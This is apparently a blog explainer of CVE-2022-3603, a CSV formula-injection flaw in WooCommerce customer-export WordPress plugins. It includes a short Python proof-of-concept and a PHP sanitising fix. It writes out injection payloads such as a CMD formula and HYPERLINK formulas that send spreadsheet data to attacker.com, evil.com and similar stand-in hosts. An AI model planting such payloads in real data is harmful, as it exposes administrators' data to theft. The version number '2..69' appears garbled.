CVE-2022-3603 - CSV Injection Vulnerability in “Export customers list csv for WooCommerce” and Related WordPress Plugins - Explained

In today’s post, we’ll take a close look at CVE-2022-3603, a CSV injection vulnerability found in popular WordPress plugins like Export customers list csv for WooCommerce, WordPress users csv, and Export Guest customer list WordPress plugin (specifically versions earlier than 2..69). We'll break down what happened, how attackers could exploit it, and most importantly, why it matters. We'll also go step by step through an example, include links to the official advisories, and give you clear guidance to protect your site.

What Is CVE-2022-3603?

This vulnerability affects the way these WordPress plugins generate and export CSV files containing customer or user data. They did not validate or sanitize user-supplied data before including it in the CSV. That means a malicious user could enter special values (such as formulas) which, when the file is opened in Microsoft Excel, could be executed. This is known as CSV Injection (or formula injection).

Export Guest customer list WordPress plugin

*(All versions before 2..69)*

All these plugins are used by online store owners and site admins to export lists of users or customers for record-keeping, marketing, or analysis.

How Does CSV Injection Work?

CSV injection occurs when spreadsheet applications like Excel interpret values starting with special characters as formulas. For example, if an attacker manages to get a customer name registered as =CMD|' /C calc'!A, and this data is exported via the plugin into a CSV file, an admin who opens this file in Excel may see Excel process the input as a formula, potentially allowing command execution or data exfiltration.

Common CSV injection payloads begin with:
- =
- +
- @
- -

For example, a malicious entry in an order form’s "Name" field

=HYPERLINK("http://attacker.com/"+A1)

When this CSV is opened, Excel executes this as a formula, potentially sending sensitive info to the attacker's site.

Severity

The vulnerability is rated as medium severity. It doesn’t allow direct compromise of your WordPress site, but could result in your desktop computer being attacked if you open an affected CSV with Excel or a similar program.

Here’s how an attacker might exploit it

1. Attack vector: An attacker registers an account or places an order on your WooCommerce site. Wherever their data is output in the exported CSV, they enter a malicious formula as their name, address, company, etc.

Example:

- Name: =HYPERLINK("http://evil.example.com?data="&A1)

2. Admin downloads CSV: The plugin allows the store admin to export a CSV of all users/orders.

Opening the file: The admin opens the CSV in Excel.

4. Formula is executed: Excel interprets the value as a formula and executes it. This might send a request to the attacker's server, or, in the worst case (with old Excel versions, macros enabled, or certain settings), execute commands.

Here's a snippet you could use to generate a malicious CSV payload demonstrating the issue

# csv-exploit-poc.py

import csv

with open('users.csv', 'w', newline='') as csvfile:
    writer = csv.writer(csvfile)
    # header
    writer.writerow(['Name', 'Email'])

    # normal user
    writer.writerow(['John Doe', 'john@example.com'])

    # attacker payload
    malicious_name = '=HYPERLINK("http://evil.com/steal?info="&A2)'
    writer.writerow([malicious_name, 'attacker@badguy.com'])

If this CSV is opened in Excel, the formula will be evaluated, and Excel may attempt to connect to the malicious URL.

Reference Links

- Original CVE Entry (CVE-2022-3603)
- Wordfence Security Advisory
- OWASP: CSV Injection
- Plugin Page (WordPress)

How to Protect Yourself

1. Update Immediately: If you use one of the affected plugins, update to the latest version (at least 2..69 or newer) as soon as possible.

2. Sanitize Data Exports: Before opening CSV files from untrusted sources (including your own store’s exports, which might be tampered with via public forms), open them first in a text editor to review the content for suspicious rows starting with =, +, -, or @.

3. Use Secure CSV Viewers: Some apps (like most open-source spreadsheet viewers) do not process formulas by default, making them safer than Excel.

4. Educate Staff: Make sure everyone handling user data exports understands the risk of CSV injection.

Recommended Code Fix

If you’re building your own plugin, always sanitize fields. For example, you can prefix dangerous values with a single quote ' to tell Excel not to evaluate them as formulas.

Here’s a PHP example

function safe_csv_field($value) {
    // Escape values that start with =, +, -, or @
    if (preg_match('/^(\=|\+|\-|\@)/', $value)) {
        return "'".$value;
    }
    return $value;
}

Use this function before you write each field to the CSV output.

Final Thoughts

CSV injection may sound like an obscure issue, but in the age of interconnected apps and e-commerce, it’s an important reminder: never trust user input, not even for downloads you generate yourself.

If you run WooCommerce or similar sites, update your plugins now and be cautious with CSV exports. For technical website owners, always validate and sanitize *everything*. Even well-meaning downloads can become a security risk.

Timeline

Published on: 11/28/2022 14:15:00 UTC
Last modified on: 11/30/2022 15:15:00 UTC